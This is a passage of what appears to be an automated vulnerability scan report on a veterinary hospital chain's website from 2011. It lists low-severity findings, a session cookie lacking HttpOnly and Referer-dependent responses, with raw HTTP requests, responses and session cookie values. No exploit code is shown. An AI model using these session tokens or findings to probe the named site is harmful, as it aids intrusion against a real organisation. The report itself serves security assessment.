ORP%2526guid%253d552C3BF2-B50A-4487-9212-B5A1CFEBF63B%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de47593670de12e47b4fa1e9df57adad6%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d79086EA1-6374-4E83-A33A-DCBB6D3E16CA%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253db15cfbc2e8b9d5050f6de59c6ed8b5b1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252fof
fer%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com
Pragma: no-cache
Content-Length: 3685

fname=&lname=&addr=&city=&state=AZ&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=31c82c3543a452dc1200540d59f0157f&guid=0AD96EEC-57E3-4BB0-B188-1922AB63F2B0&referer=&uri=h
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:10:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3161
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

5.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d17
3.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWin
dows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

6. Referer-dependent response
There are 5 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



6.1. http://www.vcahospitals.com/hanson/appt.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Request 1

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="token" id="token" value="da3b15eadd9ef1b522fdccad42853c5c" />
           <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/hanson" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" />
           <input type="hidden" name="guid" id="guid" value="" />
           <input type="hidden" name="source" id="source" value="hanson" />
           <input type="hidden" name="appt_type" value="appt" />
       </form>
<p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. For more information, see the <a href="http://www.vcahospitals.com/hanson/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p>        <!-- Google Website Optimizer Tracking Script -->
       <script type="text/javascript">
if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+
(document.location.protocol=='https:'?'s://ssl':'://www')+
'.google-analytics.com/ga.js"></sc'+'ript>')</script>
<script type="text/javascript">
try {
var gwoTracker=_gat._getTracker("UA-8482760-2");
gwoTracker._trackPageview("/1639539707/test");
}catch(err){}</script>
<!-- End of Google Website Optimizer Tracking Script -->
                   </div><!-- .content -->
                   <div class="nav-page">
<h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3>
                       <div id="pictogram"><img src="http://www.vcahospitals.co
...[SNIP]...

Request 2

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="token" id="token" value="d06ff4a968334fca7610b3fb80c4f351" />
           <input type="hidden" name="referer" id="referer" value="" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" />
           <input type="hidden" name="guid" id="guid" value="" />
           <input type="hidden" name="source" id="source" value="hanson" />
           <input type="hidden" name="appt_type" value="appt" />
       </form>
<p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. For more information, see the <a href="http://www.vcahospitals.com/hanson/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p>        <!-- Google Website Optimizer Tracking Script -->
       <script type="text/javascript">
if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+
(document.location.protocol=='https:'?'s://ssl':'://www')+
'.google-analytics.com/ga.js"></sc'+'ript>')</script>
<script type="text/javascript">
try {
var gwoTracker=_gat._getTracker("UA-8482760-2");
gwoTracker._trackPageview("/1639539707/test");
}catch(err){}</script>
<!-- End of Google Website Optimizer Tracking Script -->
                   </div><!-- .content -->
                   <div class="nav-page">
<h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3>
                       <div id="pictogram"><img src="http://www.vcahospitals.com/hanson/image/hospital-main.jpg"
...[SNIP]...

6.2. http://www.vcahospitals.com/main/offer

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer

Request 1

GET /main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:50 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="token" id="token" value="120e7c22790ed42734da72210579f877" />
           <input type="hidden" name="guid" id="guid" value="04BE5E58-E0C0-4263-A98D-0DE95E71916F" />
           <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/main/offer/thank-you.html?" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" />
           <input type="hidden" name="formtype" id="formtype" value="CORP" />
           <input type="hidden" name="newmex" id="newmex" value="0" />
           <input type="hidden" name="date" value="1307084400" />
           <input type="hidden" name="tollfree" value="866-825-8416" />
       </form>